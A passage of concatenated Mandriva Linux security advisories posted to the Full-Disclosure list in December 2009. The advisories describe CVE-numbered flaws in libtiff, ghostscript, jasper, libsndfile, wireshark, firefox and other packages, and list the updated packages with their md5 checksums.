2008.0/x86_64/dhcp-client-3.0.7-0.1mdv2008.0.x86_64.rpm 79a273d98b5ef2f51c93c0f4d49ab82a 2008.0/x86_64/dhcp-common-3.0.7-0.1mdv2008.0.x86_64.rpm 4e1ca48b749ef04f4aff6dd6d9d34bde 2008.0/x86_64/dhcp-devel-3.0.7-0.1mdv2008.0.x86_64.rpm df97bbd0680f5b82417be5fb448a3493 2008.0/x86_64/dhcp-doc-3.0.7-0.1mdv2008.0.x86_64.rpm daa25b01f8fd36dc2cb4c0e2c119 2008.0/x86_64/dhcp-relay-3.0.7-0.1mdv2008.0.x86_64.rpm 1d283afe24bb93f3c155a2b762e50988 2008.0/x86_64/dhcp-server-3.0.7-0.1mdv2008.0.x86_64.rpm 2a2e6cca8ab0d7c62e14aa19116ac860 2008.0/SRPMS/dhcp-3.0.7-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGDHfmqjQ0CJFipgRAhxkAJ9Hi8PHKRM/bBVsFI7ZX1xpSrfcBACfS+L+ jLmws+7KhLHXB/1Rh2rDXXw= =QOvE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:169-1 ] libtiff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:169-1 http://www.mandriva.com/security/ ___ Package : libtiff Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in libtiff: Buffer underflow in the LZWDecodeCompat function in libtiff 3.8.2 allows context-dependent attackers to cause a denial of service (crash) via a crafted TIFF image, a different vulnerability than CVE-2008-2327 (CVE-2009-2285). Fix several places in tiff2rgba and rgb2ycbcr that were being careless about possible integer overflow in calculation of buffer sizes (CVE-2009-2347). This update provides fixes for these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2347 ___ Updated Packages: Mandriva Linux 2008.0: 6942dec4f625c5ca859cbf2c35445d19 2008.0/i586/libtiff3-3.8.2-8.2mdv2008.0.i586.rpm 693b50058e610310fe22274ebcbd4a5e 2008.0/i586/libtiff3-devel-3.8.2-8.2mdv2008.0.i586.rpm 63c42fbe6a60eb5c5c0614d1b1ca6495 2008.0/i586/libtiff3-static-devel-3.8.2-8.2mdv2008.0.i586.rpm cf3bbc57b9eade53f75dfc5b28de96c6 2008.0/i586/libtiff-progs-3.8.2-8.2mdv2008.0.i586.rpm dd7d7876d10944c42ca76e8c71eb4c35 2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: b4c14d385a14e9dbca6ccf1c37cdf1a4 2008.0/x86_64/lib64tiff3-3.8.2-8.2mdv2008.0.x86_64.rpm 97329de609ab88d18dccee7631825466 2008.0/x86_64/lib64tiff3-devel-3.8.2-8.2mdv2008.0.x86_64.rpm 0740aa57941c1b9413b463ef7267138d 2008.0/x86_64/lib64tiff3-static-devel-3.8.2-8.2mdv2008.0.x86_64.rpm 8f5619fd9995c58d83cf5c6b44576452 2008.0/x86_64/libtiff-progs-3.8.2-8.2mdv2008.0.x86_64.rpm dd7d7876d10944c42ca76e8c71eb4c35 2008.0/SRPMS/libtiff-3.8.2-8.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGC72mqjQ0CJFipgRAhgOAKDRVYDM0o1NDwx9HxlfFvvmB5PhtACgrvjc Eep0TsrNlfZSsSDV2xRDFXI= =2vwj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:311 ] ghostscript
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:311 http://www.mandriva.com/security/ ___ Package : ghostscript Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in ghostscript: A buffer underflow in Ghostscript's CCITTFax decoding filter allows remote attackers to cause denial of service and possibly to execute arbitrary by using a crafted PDF file (CVE-2007-6725). Buffer overflow in Ghostscript's BaseFont writer module allows remote attackers to cause a denial of service and possibly to execute arbitrary code via a crafted Postscript file (CVE-2008-6679). Multiple interger overflows in Ghostsript's International Color Consortium Format Library (icclib) allows attackers to cause denial of service (heap-based buffer overflow and application crash) and possibly execute arbirary code by using either a PostScript or PDF file with crafte embedded images (CVE-2009-0583, CVE-2009-0584). Multiple interger overflows in Ghostsript's International Color Consortium Format Library (icclib) allows attackers to cause denial of service (heap-based buffer overflow and application crash) and possibly execute arbirary code by using either a PostScript or PDF file with crafte embedded images. Note: this issue exists because of an incomplete fix for CVE-2009-0583 (CVE-2009-0792). Heap-based overflow in Ghostscript's JBIG2 decoding library allows attackers to cause denial of service and possibly to execute arbitrary code by using a crafted PDF file (CVE-2009-0196). Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation (CVE-2008-3520). Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf (CVE-2008-3522). Previousely the ghostscript packages were statically built against a bundled and private copy of the jasper library. This update makes ghostscript link against the shared system jasper library which makes it easier to address presumptive future security issues in the jasper library. Packages for 2008.0 are being provided due to extended support for Corporate products. This update provides fixes for that vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6679 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0583 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0584 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0792 ___ Updated Packages: Mandriva Linux 2008.0: d419c4cc3452b90b350c8fda68bf29f8 2008.0/i586/ghostscript-8.60-55.3mdv2008.0.i586.rpm 7e120e4166ebbf8203a05d657223c5d5 2008.0/i586/ghostscript-common-8.60-55.3mdv2008.0.i586.rpm 29685fcf8eb0bb04d59e07fcbb57973f 2008.0/i586/ghostscript-doc-8.60-55.3mdv2008.0.i586.rpm d205693e3d3ba8da5f9197992d28ed13 2008.0/i586/ghostscript-dvipdf-8.60-55.3mdv2008.0.i586.rpm 6b4c9b0bcb0e00dfadf1e4d145a4c657 2008.0/i586/ghostscript-module-X-8.60-55.3mdv2008.0.i586.rpm 04b75844bec6d20e8d642ad0c217ad1f 2008.0/i586/ghostscript-X-8.60-55.3mdv2008.0.i586.rpm b20ee4fa316e601a73131d0cca1b1643 2008.0/i586/libgs8-8.60-55.3mdv2008.0.i586.rpm 121aea93ce9d622fb7d5f616e442bc86 2008.0/i586/libgs8-devel-8.60-55.3mdv2008.0.i586.rpm 157190bd96bc7326ce9291a67db738cf 2008.0/i586/libijs1-0.35-55.3mdv2008.0.i586.rpm 50d401f2135225ec3cad3881ceb084bd 2008.0/i586/libijs1-devel-0.35-55.3mdv2008.0.i586.rpm 5f649dc370d0b581b067d8b5db30a1a2 2008.0/SRPMS/ghostscript-8.60-55.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 54292241ec99616cedd3099e4d2ff6a5 2008.0/x86_64/ghostscript-8.60-55.3mdv2008.0.x86_64.rpm ede49cf300d10edf9b67067c13608fd2 2008.0/x86_64/ghostscript-common-8.60-55.3mdv2008.0.x86_64.rpm e75cb4fb3d2b00ff395da26109518f6b 2008.0/x86_64/ghostscript-doc-8.60-55.3mdv2008.0.x86_64.rpm 2644ccf83047b448e0d0097bab2dad19 2008.0/x86_64/ghostscript-dvipdf-8.60-55.3mdv2008.0.x86_64.rpm eaf0ee1db669bf25c30839b2da7782d1 2008.0/x86_64/ghostscript-module-X-8.60-55.3mdv2008.0.x86_64.rpm 62ad0f8af
[Full-disclosure] [ MDVSA-2009:142-1 ] jasper
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:142-1 http://www.mandriva.com/security/ ___ Package : jasper Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in jasper: The jpc_qcx_getcompparms function in jpc/jpc_cs.c for the JasPer JPEG-2000 library (libjasper) before 1.900 allows remote user-assisted attackers to cause a denial of service (crash) and possibly corrupt the heap via malformed image files, as originally demonstrated using imagemagick convert (CVE-2007-2721). Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation (CVE-2008-3520). The jas_stream_tmpfile function in libjasper/base/jas_stream.c in JasPer 1.900.1 allows local users to overwrite arbitrary files via a symlink attack on a tmp.XX temporary file (CVE-2008-3521). Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf (CVE-2008-3522). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522 ___ Updated Packages: Mandriva Linux 2008.0: 5f9c8dfae30f0cadf061de621b8c8001 2008.0/i586/jasper-1.900.1-2.1mdv2008.0.i586.rpm 31a18f0fd0eaf9fe8fbc3152716c5a97 2008.0/i586/libjasper1-1.900.1-2.1mdv2008.0.i586.rpm c19c0a59243be390523cfeb26362e177 2008.0/i586/libjasper1-devel-1.900.1-2.1mdv2008.0.i586.rpm 88a5c06798169a312935e33918194286 2008.0/i586/libjasper1-static-devel-1.900.1-2.1mdv2008.0.i586.rpm 16072736699b72d0d545a3b632fa0d70 2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 387d1e14ef8069d239bff354726b26cb 2008.0/x86_64/jasper-1.900.1-2.1mdv2008.0.x86_64.rpm 2ab7bf2550e00e423b511b5921a103b3 2008.0/x86_64/lib64jasper1-1.900.1-2.1mdv2008.0.x86_64.rpm 5abd166c380e4ed1cc9b925b5d0f1845 2008.0/x86_64/lib64jasper1-devel-1.900.1-2.1mdv2008.0.x86_64.rpm 36e2d6ef0ceb0ffdfa88265a9b016173 2008.0/x86_64/lib64jasper1-static-devel-1.900.1-2.1mdv2008.0.x86_64.rpm 16072736699b72d0d545a3b632fa0d70 2008.0/SRPMS/jasper-1.900.1-2.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBu5mqjQ0CJFipgRAnnxAKC1Yqp3matYvYtzco9NCLtW6KlsNgCgjIzw PL7nkNJNn62nP+NYytohvZk= =f+gJ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:132-1 ] libsndfile
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:132-1 http://www.mandriva.com/security/ ___ Package : libsndfile Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in libsndfile: Heap-based buffer overflow in voc_read_header in libsndfile 1.0.15 through 1.0.19, as used in Winamp 5.552 and possibly other media programs, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a VOC file with an invalid header value (CVE-2009-1788). Heap-based buffer overflow in aiff_read_header in libsndfile 1.0.15 through 1.0.19, as used in Winamp 5.552 and possibly other media programs, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an AIFF file with an invalid header value (CVE-2009-1791). This update provides fixes for these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1788 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1791 ___ Updated Packages: Mandriva Linux 2008.0: ea472db88b618bee93d7f3ab1f8ab9b4 2008.0/i586/libsndfile1-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 3e7fb05e87d69989223f20c5a9aae811 2008.0/i586/libsndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 9bce8a72068db657b5027c88bc256f37 2008.0/i586/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 270c48e98c2ce89f2449f0be3d9dbad1 2008.0/i586/libsndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.i586.rpm 2e269eb125174d1cbb2441a30f484408 2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9b4bdc3d55214078d297ad89122c567f 2008.0/x86_64/lib64sndfile1-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm f251a5402b23fce61b9e90e7db24aa29 2008.0/x86_64/lib64sndfile-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm f1a6a61239498b667ed594bddee1e00b 2008.0/x86_64/lib64sndfile-static-devel-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm 8525f4f8f5bb8455f86cc23abaa40612 2008.0/x86_64/libsndfile-progs-1.0.18-0.pre20.0.1mdv2008.0.x86_64.rpm 2e269eb125174d1cbb2441a30f484408 2008.0/SRPMS/libsndfile-1.0.18-0.pre20.0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBSImqjQ0CJFipgRAjwlAJ9T5WH37B1T40fhxW1V5tj5XjmpiQCgiXdg v+m6uh2k4UrY0KRwoGJ7Wc8= =5Ogf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:130-1 ] gstreamer0.10-plugins-good
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:130-1 http://www.mandriva.com/security/ ___ Package : gstreamer0.10-plugins-good Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple integer overflows in the (1) user_info_callback, (2) user_endrow_callback, and (3) gst_pngdec_task functions (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka gst-plugins-good or gstreamer-plugins-good) 0.10.15 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted PNG file, which triggers a buffer overflow (CVE-2009-1932). Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1932 ___ Updated Packages: Mandriva Linux 2008.0: df985dc0abc217067a7d663c411b4209 2008.0/i586/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.i586.rpm c548713a6efd8d262876bf1ed9363fe5 2008.0/i586/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.i586.rpm 97b895479d7e42ff11735889bb4c16ed 2008.0/i586/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.i586.rpm a63dccd47b65fe27b8f6319662633201 2008.0/i586/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.i586.rpm 0903bef11230d673d2cebe6e6900b2bb 2008.0/i586/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.i586.rpm e80a3bb6ed87aef074c9066e063b85ee 2008.0/i586/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.i586.rpm e3c9a6aac6da3d7b8d9a45b0b561cd86 2008.0/i586/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.i586.rpm 08745e3b02ba9fdd66573e9e1f6db381 2008.0/i586/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.i586.rpm 2bedca9a38fd4bca8879b1c947dedffa 2008.0/i586/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.i586.rpm bce20d4accbb9500b91d7dfc7283802d 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 295a03de38ee7d2f94f8f7a072d4ef83 2008.0/x86_64/gstreamer0.10-aalib-0.10.6-3.3mdv2008.0.x86_64.rpm 1949357b44313e9342f9e0f064cfe921 2008.0/x86_64/gstreamer0.10-caca-0.10.6-3.3mdv2008.0.x86_64.rpm 5b1402d0fed2ab576ae4226a4aae72a4 2008.0/x86_64/gstreamer0.10-dv-0.10.6-3.3mdv2008.0.x86_64.rpm 22803eab821db27cca1c6362ae2a05d7 2008.0/x86_64/gstreamer0.10-esound-0.10.6-3.3mdv2008.0.x86_64.rpm 915d40526cdfc5bab5d54126f6a90f69 2008.0/x86_64/gstreamer0.10-flac-0.10.6-3.3mdv2008.0.x86_64.rpm 48f0e87f8105251ad7edd7553ae2060f 2008.0/x86_64/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.x86_64.rpm 93e82958bc9833629af16a21372b503d 2008.0/x86_64/gstreamer0.10-raw1394-0.10.6-3.3mdv2008.0.x86_64.rpm 936698fc48970cd422cd0fac330e5e99 2008.0/x86_64/gstreamer0.10-speex-0.10.6-3.3mdv2008.0.x86_64.rpm 1edc68a1a2e4248495df6435a4e38ac6 2008.0/x86_64/gstreamer0.10-wavpack-0.10.6-3.3mdv2008.0.x86_64.rpm bce20d4accbb9500b91d7dfc7283802d 2008.0/SRPMS/gstreamer0.10-plugins-good-0.10.6-3.3mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGBF8mqjQ0CJFipgRAlvjAJ9h9KnXtEP3oqwgaUvRERM7z8xEFQCdGHms QZ0/5EhLrjKzxAm3OVrws2A= =OIZm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:128-1 ] libmodplug
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:128-1 http://www.mandriva.com/security/ ___ Package : libmodplug Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in libmodplug: Integer overflow in the CSoundFile::ReadMed function (src/load_med.cpp) in libmodplug before 0.8.6, as used in gstreamer-plugins and other products, allows context-dependent attackers to execute arbitrary code via a MED file with a crafted (1) song comment or (2) song name, which triggers a heap-based buffer overflow (CVE-2009-1438). Buffer overflow in the PATinst function in src/load_pat.cpp in libmodplug before 0.8.7 allows user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via a long instrument name (CVE-2009-1513). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1513 ___ Updated Packages: Mandriva Linux 2008.0: 9d7e4ce45987f8103e6e68ff6a789afa 2008.0/i586/libmodplug0-0.8.4-1.1mdv2008.0.i586.rpm 65ca878fccad537bd0dcc8e7b6156d3a 2008.0/i586/libmodplug0-devel-0.8.4-1.1mdv2008.0.i586.rpm 496719add48603cf87e3a27025b5dabb 2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4e456e05bc59c08a0a0adaf7a2ccce37 2008.0/x86_64/lib64modplug0-0.8.4-1.1mdv2008.0.x86_64.rpm 389e7edbacb029bcd9afef7cf4a9ba0e 2008.0/x86_64/lib64modplug0-devel-0.8.4-1.1mdv2008.0.x86_64.rpm 496719add48603cf87e3a27025b5dabb 2008.0/SRPMS/libmodplug-0.8.4-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGAw1mqjQ0CJFipgRArw1AJ41+1ZC03JlLV0BIC9hVLI4w/SjWACgyafO xS9rR8i92aZtwqzfYVcDqsA= =eXl+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:292-1 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:292-1 http://www.mandriva.com/security/ ___ Package : wireshark Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Vulnerabilities have been discovered and corrected in wireshark, affecting DCERPC/NT dissector, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a file that records a malformed packet trace (CVE-2009-3550); and in wiretap/erf.c which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted erf file (CVE-2009-3829). The wireshark package has been updated to fix these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3829 ___ Updated Packages: Mandriva Linux 2008.0: 8b075be8db6b26deba7933a925b12f5d 2008.0/i586/dumpcap-1.0.10-0.1mdv2008.0.i586.rpm 3477bcc8d3e2257489b4ae8573f5f8d0 2008.0/i586/libwireshark0-1.0.10-0.1mdv2008.0.i586.rpm 451163f6f02baa7c1eb48fab26e8adfa 2008.0/i586/libwireshark-devel-1.0.10-0.1mdv2008.0.i586.rpm b457625c43f2d605e18e6537b958f0b7 2008.0/i586/rawshark-1.0.10-0.1mdv2008.0.i586.rpm 1ffce24777b986cccd506aee471a14e9 2008.0/i586/tshark-1.0.10-0.1mdv2008.0.i586.rpm 18467254cc21a36f25e0ac47013c90b5 2008.0/i586/wireshark-1.0.10-0.1mdv2008.0.i586.rpm 54bcf934bbf85cf9317abd3f693c1286 2008.0/i586/wireshark-tools-1.0.10-0.1mdv2008.0.i586.rpm 927ccd36d358084a70554eda33b015df 2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4320e20a9c0a61623c859ba20c4030a4 2008.0/x86_64/dumpcap-1.0.10-0.1mdv2008.0.x86_64.rpm 4886aa56bd3daf5e906343b92d1c7d57 2008.0/x86_64/lib64wireshark0-1.0.10-0.1mdv2008.0.x86_64.rpm d3d9e1847a4b3ba05a00614e71d76664 2008.0/x86_64/lib64wireshark-devel-1.0.10-0.1mdv2008.0.x86_64.rpm ce78c38b33a2c3c0edde2355845a3218 2008.0/x86_64/rawshark-1.0.10-0.1mdv2008.0.x86_64.rpm 41e36f27fa93dfd8ecacae797403412a 2008.0/x86_64/tshark-1.0.10-0.1mdv2008.0.x86_64.rpm 9b3829112d7250b78294d0f65c71d85b 2008.0/x86_64/wireshark-1.0.10-0.1mdv2008.0.x86_64.rpm 3e6d92fbdae924c7bb131fd867895695 2008.0/x86_64/wireshark-tools-1.0.10-0.1mdv2008.0.x86_64.rpm 927ccd36d358084a70554eda33b015df 2008.0/SRPMS/wireshark-1.0.10-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGAmomqjQ0CJFipgRArBzAJ4owwY4ReC8xR2AHGHILeOpGhziHwCdGwn4 luHzusXu4mtItmvczmZxMTs= =OOZm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:290-1 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:290-1 http://www.mandriva.com/security/ ___ Package : firefox Date: December 2, 2009 Affected: 2008.0 ___ Problem Description: Security issues were identified and fixed in firefox 3.0.x: Security researcher Alin Rad Pop of Secunia Research reported a heap-based buffer overflow in Mozilla's string to floating point number conversion routines. Using this vulnerability an attacker could craft some malicious JavaScript code containing a very long string to be converted to a floating point number which would result in improper memory allocation and the execution of an arbitrary memory location. This vulnerability could thus be leveraged by the attacker to run arbitrary code on a victim's computer (CVE-2009-1563). Security researcher Jeremy Brown reported that the file naming scheme used for downloading a file which already exists in the downloads folder is predictable. If an attacker had local access to a victim's computer and knew the name of a file the victim intended to open through the Download Manager, he could use this vulnerability to place a malicious file in the world-writable directory used to save temporary downloaded files and cause the browser to choose the incorrect file when opening it. Since this attack requires local access to the victim's machine, the severity of this vulnerability was determined to be low (CVE-2009-3274). Security researcher Paul Stone reported that a user's form history, both from web content as well as the smart location bar, was vulnerable to theft. A malicious web page could synthesize events such as mouse focus and key presses on behalf of the victim and trick the browser into auto-filling the form fields with history entries and then reading the entries (CVE-2009-3370). Security researcher Marco C. reported a flaw in the parsing of regular expressions used in Proxy Auto-configuration (PAC) files. In certain cases this flaw could be used by an attacker to crash a victim's browser and run arbitrary code on their computer. Since this vulnerability requires the victim to have PAC configured in their environment with specific regular expresssions which can trigger the crash, the severity of the issue was determined to be moderate (CVE-2009-3372). Security research firm iDefense reported that researcher regenrecht discovered a heap-based buffer overflow in Mozilla's GIF image parser. This vulnerability could potentially be used by an attacker to crash a victim's browser and run arbitrary code on their computer (CVE-2009-3373). Mozilla security researcher moz_bug_r_a4 reported that the XPCOM utility XPCVariant::VariantDataToJS unwrapped doubly-wrapped objects before returning them to chrome callers. This could result in chrome privileged code calling methods on an object which had previously been created or modified by web content, potentially executing malicious JavaScript code with chrome privileges (CVE-2009-3374). Security researcher Gregory Fleischer reported that text within a selection on a web page can be read by JavaScript in a different domain using the document.getSelection function, violating the same-origin policy. Since this 